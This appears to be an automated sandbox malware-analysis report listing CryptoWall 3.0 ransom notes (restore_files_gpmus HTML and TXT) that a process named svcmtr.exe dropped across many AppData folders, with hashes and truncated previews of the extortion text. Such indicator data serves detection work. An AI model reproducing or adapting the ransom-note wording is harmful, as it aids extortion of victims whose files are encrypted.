                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Feeds\Feeds for United States~\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Feeds\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Feeds\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EmieSiteList\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EmieSiteList\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EmieUserList\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EmieUserList\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\TabRoaming\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\TabRoaming\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-2845162440\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-2845162440\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
